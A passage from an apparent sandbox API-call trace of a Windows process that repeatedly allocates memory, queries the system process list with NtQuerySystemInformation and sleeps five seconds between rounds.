RegionSize=0xdea68*=0x10000) returned 0x0 [0266.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.729] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.738] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.750] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.760] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.770] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.781] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.792] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.805] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.887] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.889] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.903] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.911] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.919] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.926] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.933] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.940] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.943] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.947] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.955] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.962] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 